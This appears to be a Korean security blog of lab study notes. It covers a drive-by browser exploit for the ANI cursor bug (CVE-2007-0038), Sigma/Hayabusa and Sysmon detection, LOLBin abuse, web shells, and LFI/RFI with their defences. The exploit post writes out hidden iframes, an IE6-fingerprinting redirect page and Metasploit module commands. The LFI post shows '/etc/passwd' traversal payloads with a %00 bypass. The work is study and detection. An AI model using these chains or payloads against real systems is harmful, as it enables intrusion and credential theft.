멈출 수 없는 발전

브라우저 익스플로잇

no-brake — Mon, 1 Jun 2026 17:25:45 +0900

브라우저 익스플로잇 : 웹 브라우저나 그 구성 요소(JavaScript 엔진 등)의 보안 취약점을 악용해 악성코드를 실행하거나 시스템을 장악하는 공격 기법

[CVE-2007-0038(애니메이션 커서 원격 코드 실행 취약점) 개념]

HTML 페이지 혹은 웹 페이즈를 통해 로드되는 애니메이션 커서 파일(.ANI)을 USER32.DLL 라이브러리의 함수에서 처리하는 과정에서 버퍼 오버플로우가 발생하는 취약점
브라우저에서 도메인 URI를 통해 서버의 JS, HTML, CSS 같은 내용 전달 받음
서버에서 .ani 파일을 브라우저에 전달해 커서 변경 가능
브라우저는 USER32.dll을 이용해 마우스 커서 효과 적용

[.ANI 파일]

웹 페이지에서 로드
멀티미디어 파일 포멧인 RIFF(Resource Interchange File Format) 포멧 기반으로 구성되어, "RIFF" 시그니처를 포함한 해더 시작
가변 길이의 구획들인 청크(Chunk)로 다수 포함하고 있음

[청크(Chunk) 파일 구조]

tag, size, data 멤버로 구성
tag, size 멤버는 4바이트
data 멤버는 가변 크기
tag : ascii으로 표현되며 seq, LIST, rate 또는 anih 등 값을 가짐

[ANI 파일 구조 분석]

시그니처 RIFF
File size : 0x00000CA0
File type : ACON

청크(Chunk) tag 멤버 : LIST, anih

첫 번째 정크 크기 : 0x00000044

두 번째 정크 크기 : 0x00000024

세 번쨰 정크 크기 : 0x00000C1C

[T1189(Drive-by Compromise) 개념]

웹 브라우저가 감염된 웹 사이트 방문시 악성코드 다운로드 또는 실행하여 통제 권한 탈취

구분	설명
감염된 웹사이트	공격자에 의해 해킹된 웹 서버 웹사이트 코드를 수정해 랜딩 서버로 이동
랜딩 서버	취약점 있는 브라우저 종류 및 버전 확인 후 익스플로잇/페이로드 배포 서버로 이동
익스플로잇/페이로드 배포 서버	실제 공격이 이뤄지는 서버 랜딩 서버에서 수집한 정보를 토대로 브라우저 취약점 공격 진행

[공격]

감염된 웹 페이지 코드

<html>
	<head>
    	<title> Test Page </title>
    </head>
	<body>
		Test Page... <br>
		Welcome!! <br>
		<!-- <iframe src="http://192.168.57.80/land.html"></iframe> -->
        <!-- <iframe src="http://192.168.57.80/randgen.html" width=0 height=0></iframe> -->
	</body>
<html>

iframe : 웹 페이지 내부에 다른 웹 페이지 삽입할 수 있게 해주는 HTML 태그로 현재 페이지 내에 다른 웹 페이지가 뜨게 함

랜딩 페이지

<html>
	<meta http-equiv="cache-control" content="no-cache">
    <meta http-equiv="expires" content="-1">
    <head><title> test page </title></head>
    <body>
		<script>
			alert ("Landing Page!");
			var browser_ver = navigator.userAgent.toLowerCase(); 
    		alert ("Your Browser Version:" + browser_ver); 
    		if(browser_ver.index0f('msie 6.0')>0) { 
    			alert ("Your Browser is vulnerable");
        		location.href= "http://192.168.57.11";
     		} else { 
        		alert ("Your Browser is not vulnerable");
			}
		</script>
	</body>
</html>

랜딩페이지 접속 성공시 : "Landing Page!" 팝업 발생
browser_ver : userAgent 정보 저장
if문을 통해 공격 가능한 취약 브라우저 여부 확인
취약 브라우저 일시 악성 페이로드 전달하는 서버로 리다이렉션 함

악성 스크립트

use exploit/windows/browser/ms07_017_ani_loadimage_chunksize
set SRVHOST 192.168.57.11
set SRVPORT 80
set PAYLOAD windows/exec
set CMD calc.exe
exploit

use ex~~~ : 2007년 ani 커서 파일 취약점 이용한 Exploit 모듈 이용
set ~~ : 호스팅할 악성 웹 서버 IP 지정, 해당 주소 접속 시 Exploit 실행
set : 웹 서버 포트 설정
set : 익스플로잇 성공시 실행할 페이로드 종류
set : 익스플로잇 성공시 실행할 명령어 지정
exploit : 악성 파일 호스팅하는 웹서버 시작

[분석]

ANI 파일의 ID는 "anih"이며 청크 사이즈는 0x24(36byte)

공격자는 ANI파일의 사이즈인 36byte보다 큰 데이터를 넣어 버퍼 오버플로우 발생

alert tcp any any -> any any (
	msg: "BROWSER-IE MS IE ANI file parsing buffer overflow attempt";
	flow: to client, established;
	file_data;
	content: "RIFF"; depth: 4;
	content: "ACON"; within: 4; distance: 4;
	content: "anih"; distance: 0; nocase;
	byte_test: 4, >, 36, 0, relative, little;
    sid: 3079; rev:21;
)

: 모든 TCP 트래픽 감시하고, 공격 발생 시 알림 발생
: 파일 내용 기준으로 검사 시작
: 파일 처음 4바이트가 "RIFF" 여부 확인
: "RIFF"로부터 4바이트 이후 "ACON" 여부 확인
: "ACON" 이후 바로 "anih"가 있는지
: 현재 위치로부터 4바이트 읽고, little-endian 해석시 값이 36보다 크면 탐지

프로세스 인젝션 이벤트 탐지

no-brake — Wed, 27 May 2026 13:36:55 +0900

[시그마 룰]

[HAYABUSA 툴 이용해 SYSMON 로그파일 조사]

(현재 디렉토리 위치)> (HAYABUSA 툴 경로) csv-timeline -r (룰 디렉토리 위치) -d (sysmon 로그 디렉토리 위치) -C -o (저장할 결과파일명)

csv-timeline : CSV 형식의 시간순으로 정렬
-C -o (저장할 결과파일명) : 이미 저장할 결과 파일 존재시 덮어쓰기

[실행 결과]

총 9,617개 이벤트 로그 중, 작성한 시그마룰 기준 총 35개의 이벤트 탐지
DESKTOP-9SCSJHC, IEWIN7, DESKTOP-PIU87N6 단말 3대 확인

[Timeline Explorer 툴로 결과 파일 확인]

[분석결과]

단말	날짜	시간	이벤트 내용
DESKTOP-9SCSJHC	2021.11.08 ~ 2022.06.17	다수 발생	C:\Program Files\VMware\VMware Tools\VMwareResolutionSet.exe -> C:\Windows\System32\csrss.exe
DESKTOP-9SCSJHC	2021.11.10	17:32:15	"SYSTEM" IL, C:\Users\user03\AppData\Local\Temp\conhost.exe(5808) -> C:\Windows\System32\winlogon.exe(668)
IEWIN7	2020.09.28	21:47:36	"SYSTEM" IL, C:\Windows\System32\rdrleakdiag.exe(3352) -> C:\Windows\System32\/sass.exe(668)
DESKTOP-PIU87N6	2019.05.26	13:01:43	"SYSTEM" IL, C:\Users\IEUser\Desktop\info.rar\jjs.exe -> C:\Windows\System32\svchost.exe(3908)

"DESKTOP-9SCSJHC" 시스템의 "conhost.exe" 프로세스는 시스템 프로세스랑 이름은 동일하나 경로가 잘못 되어있고, 인젝션 대상 프로세스가 "winlogon.exe" 인것으로 보아 키로깅 목적으로 추정
"DESKTOP-PIU87N6" 시스템의 "rdrleakdiag.exe" 프로세스는 리소스 누수 진단 도구로 프로세스 메모리 덤프 기능을 이용하여 "lsass.exe" 메모리를 덤프 한다는것은 사용자의 자격증명(계정 및 패스워드 등)을 탈취 가능성 있음
" IEWIN7" 시스템의 "jjs.exe" 파일은 정상 실행 파일이 아니며, 바탕화면에서 실행 됨에도 불구하고 "system" 권한으로 실행되었음, 정상 프로그램인 "svchost.exe" 내에 악성코드 인젝션 가능성 높음

프로세스 리니지 이상 이벤트 식별(서비스 호스팅)

no-brake — Wed, 27 May 2026 10:53:56 +0900

[비정상 서비스 호스트 프로셋세스 탐지 시그마 룰]

process_create_svchost
- EventID : 1 - 프로세스 생성 이벤트
- Image : 해당 프로세스 실행
svchost_with_no_commandline : 파라미터 없이 'svchost.exe'로 끝
regular_parent_filter : 부모 프로세스가 '..\services.exe'
조건 : process_create_svchost에 해당 프로세스가 생성되었고, 파라미터 없이 'svchost.exe'로 끝나거나 부모 프로세스가 '..\services.exe' 아닌 것

[HAYABUSA 툴 이용해 SYSMON 로그파일 조사]

(현재 디렉토리 위치)> (HAYABUSA 툴 경로) csv-timeline -r (룰 디렉토리 위치) -d (sysmon 로그 디렉토리 위치) -C -o (저장할 결과파일명)

csv-timeline : CSV 형식의 시간순으로 정렬
-C -o (저장할 결과파일명) : 이미 저장할 결과 파일 존재시 덮어쓰기

[실행 결과]

총 9,617개 이벤트 로그 중, 작성한 시그마룰 기준 총 5개의 이벤트 탐지
DESKTOP-9SCSJHC, IEWIN7 단말 2대 확인

[Timeline Explorer 툴로 결과 파일 확인]

[분석결과]

단말	날짜	시간	이벤트 내용
IEWIN7	2019.05.26	13:01:43	(jjs.exe->svchost.exe) C:\Users\IEUser\Desktop\info.rar\jjs.exe, PPID: 3883 - 서버호스트(svchost.exe) 프로세스의 부모가 "services.exe"가 아닌 건
	2021.08.19	01:36:43	(DHL_Tracking->svchost.exe) C:\Users\ieuser\Documents\dhl_tracking.exe, PPID:1608, IL:HIGH - 기본적으로 Medium 권한이어야 하지만 HIGH 권한으로 확인되어 공격자가 이미 관리자 수준 이상의 권한 획득한 것으로 예상됨
	2021.08.19	01:45:20	(mssrv32.exe->svchost.exe) C:\Windows\System32\mssrv32.exe, PPID: 1620, IL:SYSTEM - 기본적으로 Medium 권한이어야 하지만 HIGH 권한으로 확인되어 공격자가 이미 관리자 수준 이상의 권한 획득한 것으로 예상됨

한컴 오피스 문서 포스트스크립트 실행 이벤트 탐지

no-brake — Wed, 27 May 2026 10:00:10 +0900

[시그마 룰 설명]

title : 시그마룰 명
EventID : 1 - 프로세스 생성
hwp.exe 부모 프로세스
포스트스크립트('gswin32c.exe', 'gswin32.exe', 'gswin64c.exe', 'gswin64.exe', 'gbb.exe') 자식 프로세스

[HAYABUSA 툴 이용해 SYSMON 로그파일 조사]

(현재 디렉토리 위치)> (HAYABUSA 툴 경로) csv-timeline -r (룰 디렉토리 위치) -d (sysmon 로그 디렉토리 위치) -C -o (저장할 결과파일명)

csv-timeline : CSV 형식의 시간순으로 정렬
-C -o (저장할 결과파일명) : 이미 저장할 결과 파일 존재시 덮어쓰기

[실행 결과]

총 9,617개 이벤트 로그 중, 작성한 시그마룰 기준 2개의 이벤트 탐지
DESKTOP-9SCSJHC 단말 1대 확인

[Timeline Explorer 툴로 결과 파일 확인 및 분석결과 ]

단말	날짜	시간	이벤트 내용
DESKTOP-9SCSJHC	2021.11.10	15:36:46 ~ 15:36:48	- C:\Users/user03\Downloads [개발팀] 채용요청서.hwp" 파일을 열람 - 포스트스크립트가 포함되어 있음 - gbb.exe 프로그램이 파일내에 있는 포스트스크립트 파일을 %TEMP% 폴더 이하로 이동 - 옮겨진 포스트스크립트 파일은 GSWIN32C.EXE 프로그램에 의해 실행

LOL 바이너리

no-brake — Tue, 26 May 2026 16:17:10 +0900

[개념]

이미 시스템에 설치되어 있어 별도 수정하는 과정 없이 공격에 바로 사용 가능한 기능을 가진 정상적인 실행 파일
해당 파일은 정상적이며 코드 서명이 되어 있는 신뢰할 수 있는 바이너리이다.
Proxy/indirect execution, 파일 다운로드/업로드, UAC 우회등 악용 됨
공격자는 탐지, 차단 메커니즘 우회하는데 유리함

[bitsamin.exe]

백그라운드에서 안정적으로 파일 전송하는 기능
업데이트 및 시스템 내부 작업에서 사용 됨
일반적으로 외부에서 악성코드가 내부로 다운로드시 보안 솔루션은 브라우저나 알려진 악성 다운로드 도구를 우선적으로 의심
공격자는 백그라운드 전송 서비스 기능이 있는 해당 LOL 바이너리를 사용
별도의 악성 다운로드 도구 나 웹 브라우저 사용 없이 정상 시스템 도구만으로 진행 됨
브라우저 기반 보안 정책이나 일부 네트워크 탐지 우회로 행위 기반 탐지 적발이 되지 않을 가능성이 높음
다운로드 뿐만 아니라 복사, 실행을 위한 사전 단계에서도 자주 악용 됨

[DLL side loading를 이용한 로드 순서 악용]

정상 실행 파일을 그대로 사용하면서, 실행 파일을 참조하는 DLL 이름과 같은 악성 DLL을 특정 경로에 배치
정상 파일 실행 시 의도치 않은 악성 DLL 함께 로드 함.
겉으로는 정상적으로 실행된것 처럼 보이나 악성 코드가 함께 실행되는 구조
공격자는 새로운 실행 파일 생성 없이 기존 신뢰 받은 실행 파일을 그대로 사용하기 때문에 탐지와 분석이 어려움

[certutil.exe]

원도우 인증서 조회하고 관리, 원격 서버에서 파일 다운로드, Base64 형태의 데이터 디코딩
공격자는 외부 서버에 저장된 파일을 문자열 또는 인코딩된 데이터 형태로 다운로드 후, 해당 도구를 사용하여 디코딩 함
네트워크 상에서는 실행 파일 형태로 전달되지 않고 단순한 텍스트나 인코딩된 파일 처럼 보임
별도의 악성 도구 없이 인증된 해당 도구만으로 다운로드, 변환, 실행까지 이루워짐
분석 관점에서는 단순히 해당 도구 실행 여부 중점이 아닌 '어떤 인자'를 가지고 실행 되었은지가 중점이 되어야 함
일반적인 인증서 관리 목적이라면 외부 서버와 통신하거나 실행 파일 생성할 이유가 없음

[mshta.exe]

HTA : HTML과 스크립트로 구성된 애플리케이션으로 브라우저 보안 정책 영향 없이 로컬 시스템 권한으로 실행 가능
HTA 파일을 명령어를 통해 직접 실행 하도록 제공하는 도구
외부 서버에 호스팅된 악성 스크립트 실행
- C2 서버에 HTA 파일이나 스크립트를 업로드 후, 스크립트를 직접 실행
- 로컬 디스크에 실행 파일이 저장되지 않고 스크립트 형태로만 동작하기 때문에 파일 기반 탐지 우회 쉬움
레지스트리에 은닉된 스크립트 실행
- 악성 스크립트를 파일로 저장하지 않고, 레지스트리 값에 문자열 형태로 은닉하여 메모리상에서 바로 실행
- 디스크에 명확한 악성 파일이 남지 않음
HTA 환경에서 자바스크립트와 ActiveXObject를 함께 사용 가능하여 명령 실행, 파일 생성, 추가 스크립트 호출 등 후속 행위 가능

[rundll32.exe]

DLL 파일에 포함된 익스포트 함수를 실행하기 위한 도구
제어판 항목 실행, 시스템 설정 호출 등 정상적인 운영체제 동작에 사용
파워쉘 스크립트 실행
- 직접 DLL로드가 아닌 다른 LOL 바이너리와 연계하여 스크립트 실행하는 구조를 구성
- 'rundll32.exe > mshta.exe > powershell.exe' 같은 실행 흐름을 형성하여, 스크립트 파일을 디스크에 저장하지 않고 메모상에서만 실행되어 '파일 기반 탐지 우회'
자바스크립트 스킴 이용한 스크립트 실행
- 특정 호출 방식으로 자바스크립트 코드 실행 허용하는 구조를 가짐
- 공격자는 자바스크립트 코드 내부에 ActiveXObject를 생성하고, 이를 통해 추가 명령 실행
- 파워쉘이 호출되어, 외부 서버로 부터 스크립트 다운로드하여 즉시 실행 가능 형태
본래 목적인 DLL 실행에 벗어나, 스크립트 실행과 명령 전달을 위해 중간 연결(허브)로 사용됨

시스마 룰

no-brake — Tue, 26 May 2026 13:32:35 +0900

[정의]

YAML 문법을 이용하여 보안과 관련된 이벤트를 표현하기 위한 규칙의 집합
다양한 형식을 가진 로그에 적용하여 보안 관련 이벤트 식별하는데 사용
SIEM 벤더나 플랫폼마다 보안 이벤트 탐지에 사용되는 규칙 호환 함

[시그마 룰 포멧]

[룰 예시]

실행된 프로세스 이미지 경로가 "\cmd.exe"로 끝나는 경우 탐지
공격자가 경로 변경을 한 후 실행했어도 파일명 변경 안할 시 탐지 가능

'Net.WebClient', 'DownloadFile', 'DownloadString', 'Invoke-WebRequest' : 해당 명령어들은 축약어가 사용 가능해 강력한 명령어들 이다.
시스템 관리자 계정 사용한 내역은 제외 하므로서 오탐률을 줄인다.

SYSMON

no-brake — Tue, 26 May 2026 10:53:22 +0900

[개념]

윈도우 시스템 이벤트 모니터링 도구
프로세스 생성, 네트워크 연결, 파일 생성/수정/접근, 레지스트리의 생성/수집/접근 등의 상세 정보를 윈도우 이벤트 로그 파일 형태로 기록하는 '이벤트 수집 에이전트'

구분	Event ID	이벤트 명칭	상세 내용
프로세스 및 드라이버 (Process Lifecycle & Execution)	ID 1	프로세스 생성 (Process Create)	전체 명령어 라인, 부모 프로세스(PPID), 해시 값 등을 기록
	ID 5	프로세스 종료 (Process Terminated)	프로세스가 종료될 때 생성, 공격 도구가 실행 후 흔적 지우기 위해 종료되는 시점 파악
	ID 6	드라이버 로드 (Driver Loaded)	서명 정보 및 해시 로깅
	ID 7	이미지 로드 (Image Loaded)	DLL 로드 시 발생
	ID 8	원격 스레드 생성 (CreateRemoteThread)	프로세스 인젝션 탐지
	ID 10	프로세스 액세스(Process Access)	한 프로세스가 다른 프로세스(예: 메모리나 스레드)를 열려고 시도할 때 기록 코드를 삽입(Process Injection)하거나 권한을 획득하려는 행위를 탐지에 유용
	ID 25	프로세스 탬퍼링 (Process Tampering)
네트워크 및 통신 (Network & IPC)	ID 3	네트워크 연결 (Network Connect)	TCP/UDP 연결, 출발지/목적지 IP 및 포트, 프로세스 정보 로깅
	ID 17, 18	파이프 생성/연결 (PipeEvent)	프로세스 간 통신(IPC) 탐지
	ID 22	DNS 쿼리 (DNS Query)	프로세스가 수행한 DNS 조회 기록
파일 시스템 (File System)	ID 2	파일 생성 시간 변경 (File Creation Time Changed)	공격자의 파일 위장 행위 탐지
	ID 11	파일 생성 (File Created)	새로운 파일 생성 기록, 랜섬웨어의 암호화 파일 생성 또는 악성 코드 드랍 감시
	ID 12~14	레지스트리 변경 사항 추적 (Registry Events)	레지스터리 키 및 값의 생성, 삭제, 이름 변경 등을 감지, 공격자의 지속성 확보 시도를 파악하는데 유용
	ID 15	파일 스트림 생성 (File Stream Created)
	ID 23, 26	파일 삭제 (File Delete)	파일 삭제 행위 기록, 설정에 따라 삭제된 아카이브 디렉토리에 백업하여 분석 활용
시스템 구성 및 레지스트리 (Registry & System State)	ID 4	Sysmon 서비스 상태 변경 (Service State Changed)	Sysmon 서비스 시작 또는 중지되었을 때 기록, 공격자가 감시 회피 목적으로 서비스 종료 확인 용도
	ID 12	레지스트리 생성 및 삭제 (Registry Object added or deleted)	공격자의 지속성 확보 시도
	ID 13	레지스트리 값 변경 (Registry Value set)	자동 시작 프로그램(Run 키 등) 확인
	ID 14	레지스트리 이름 변경 (Registry Object renamed)	공격자의 지속성 확보 시도
	ID 16	Sysmon 구성 변경 (Config State Changed)

[설정 파일 예시]

<sysmon></sysmon> : 최상위 태그, 'schemaversion' 속성으로 SYSMON에게 버전 전달
<EventFilltering> : 이벤트 ID 별로 '기억할 항목(include)'와 '제외할 항목(exculde)' 정의
예시 내용 : 모든 프로세스의 생성활동은 기록하고, 크롬 브라우저에서 발생하는 네트워크 연결만 기록에서 제외

파일 업로드 취약점 대응 방안(보안코딩)

no-brake — Tue, 26 May 2026 10:12:06 +0900

[원천적 대응]

업로드 폴더를 웹 폴더가 아닌 다른 장소에 위치
웹 폴더 내부 위치시 웹 사이트에서 직접적 호출 가능
업로드 폴더 실행 권한 제거

[완화적 대응]

업로드 가능한 파일 확장자 제한
- 필터링이 완벽하지 못하다면 우회 수단 존재 할 수 있음
업로드 파일명을 랜덤한 값으로 임의로 변경하여 파일명 예측 못하도록 함
업로드 디렉토리에 서버 스크립트 언어를 사용하지 못하도록 설정, 웹 쉘 업로드 되었더라도 실행 불가 함.

[확장자 우회 대응 실습]

Directory 지시자 : 지정한 디렉토리 내 모든 파일 서비스와 기능 허용 및 거부 설정하는 지시자
'pip_admin_flag engine off' : PHP 모듈이 해당 디렉토리 내에서 실행하지 않도록 설정

PHP 파일이 실행되지 않고 다운로드 하도록 변경 됨

웹 쉘을 이용한 파일 업로드 취약점

no-brake — Fri, 22 May 2026 17:26:34 +0900

[취약점 조건]

서버에 파일 업로드 가능
업로드 폴더 웹 디렉토리 내부에 존재
폴더 실행권한 존재
파일에 대한 필터링 존재 안함(확장자, 파일 내용, 파일 저장 경로, 파일 크기, 파일 이름 등)

[웹 쉘(Web Shell)]

웹 서버에 설치되어 원격으로 서버 제어 가능하게 하는 스크립트 파일
주로 서버 언어 스크립트로 제작
공격자가 서버 칩입 후 지속적으로 접근하거나 명령을 실행 목적
한 줄 웹 쉘
- 'eval()' 나 'exec()' 함수와 같은 명령어 실행하는 한 줄 코드
  - eval() 함수 : 문자열로 된 프로그래밍 코드(수식이나 명령어)를 인자로 받아 이를 실제 코드로 해석하고 실행
  - exec() 함수 : 현재 실행 중인 프로세스의 메모리 공간을 새로운 프로그램으로 덮어씌워 실행하는 시스템 호출
- 파일 사이즈가 작아 탐지에 쉽게 되지 않으나, 기능이 제한적임
브라우저 웹 쉘
- 그래픽 사용자 인터페이스(GUI)를 통한 서버 제어 가능
- 파일 사이즈 커 탐지에 쉽게 적발되나, 다양한 기능을 포함

[브라우저 웹 쉘 실습]

보통 업로드 파일이 '.php' 같은 서버 스크립트 확장자를 업로드는 일반적이지 않은 상황으로, 보안 설정으로 업로드 허용하지 않아야 함

게시글 URL로 확인 가능 정보 : borad 디렉토리 하위 'qna_view.php'에서 게시물 노출 확인

첨부 파일 호버시 표시되는 내용으로 확인 가능 정보 : 사용자가 업로드한 파일은 업로드한 사용자의 닉네임 폴더 생성 후 그 안에 저장되는 구조 유추

upload 이름 디렉토리가 존재한다는 가정으로 성공적으로 웹 쉘접속 완료

웹 쉘은 웹 서버 권한을 얻기 때문에 root(최상위) 권한이 아닌 apache 권한을 얻음

DB데이터 관련 접근시 DB 계정 정보를 통해 DB 탈취 가능

LFI와 RFI

no-brake — Wed, 20 May 2026 15:51:15 +0900

[Path Traversal]

외부로부터 제공받은 입력을 검증하지 않고, 바로 경로로 사용시 발생하는 취약점
웹 서버가 링크 호출을 통해 특정 파일을 받아오는 구조를 가질 때 '../' 같은 취약점 사용하여 웹 서버 내부 파일 호출
웹 디렉토리 외부에 저장된 파일 및 디렉토리에 접근 목적으로 '../'을 반복 사용하여, 허용 범위를 넘어 민감한 서버 파일 시스템 접근 가능

[LFI]

[개념]
- Locla File Include 약자로 파일 불러오기 기능을 이용하여 서버 내부의 파일에 엑세스하는 공격
- 링크 호출을 통해 특정 파일을 받아오는 구조를 가질 시 '../ 와 같은 path traversal 취약점을 사용하여 웹 서버 내부 파일을 호출하는 취약점
[Peruggia case 실습]

페이지에 따라 action 매개변수가 변경 됨

'../../../../../../../etc/passwd' 입력해도 아무런 정보 없음
- '../' 필터링이 되어 있거나
- 특정 단어만 받도록 설정된 화이트 리스트 기반
- Include() 함수 확장자 지정 됨 등.. 설정 의심

종단 문자(%00) 사용 시 접근 가능 확인
- 종단 문자(%00) : 인클루드 함수 확장자 지정 우회, 뒤에 오는 모든 내용을 무시하고 그 앞까지만 파일명으로 인식
[대응 방안]
- '../', '%00' 같은 특수문자를 문자열 치환 함수로 검열
  - '../' : 경로 이동 명령어로, 웹 디렉토리 외부로 이동하는 목적
  - '%00' : 종단 문자로, include 함수에 고정된 확장자를 무시하여 성공적으로 공격 진행
- 입력값을 필터링 하여 특정 중요 파일 호출 불가 하도록 함
- 사전에 정의된 문자열이 매개변수로 요청시에만 include 기능 사용 가능하도록 설정
  - 화이트리스트를 사용하여 지정된 파일만 포함 하도록 제한
  - 매개변수를 통해 받은 값을 직접 사용시 LFI 공격에 취약
[대응 실습]

action 매개변수에 호출되는 페이지 지정 확인

지정된 값 이외는 default 문에 설정된 코드 실행되며, 해당에서는 필터링 과정 없이 '.php' 문자열을 붙여 includes 디렉토리에 존재하는 파일 호출

'$guard_lfi = true' 설정하여 지정된 값 이외 매개변수 호출 시 호출되지 않음

설정 결과

[RFI]

개념
- Remote File Include 약자로 파일 불러오기 기능을 이용하여 외부 서버의 파일을 실행시키는 악성 행위 공격
- 외부 웹 서버의 악성 모듈을 웹 서버가 호출하도록 유도
Peruggia case 실습

악성 스크립트 내용 : 패스워드 출력

action 매개변수에 악성스크립트 경로 입력한 결과
대응 방안
- 외부 파일을 불러올 수 없도록 서버 설정 방안
  - PHP 설정에서 'allow_url_fopen = OFF' 설정
  - 에러 메세지 노출하지 않도록 'display_errors = OFF' 설정
  - 호출하는 디렉토리 고정 'include('/image':%입력값);
대응 실습

'allow_url_fopen = Off' : PHP에서 외부 파일을 URL 방식으로 include 허용 여부
' allow_url_include' : include(), require() 계열의 함수 사용 시 외부 사이트의 파일을 호출 여부

설정 결과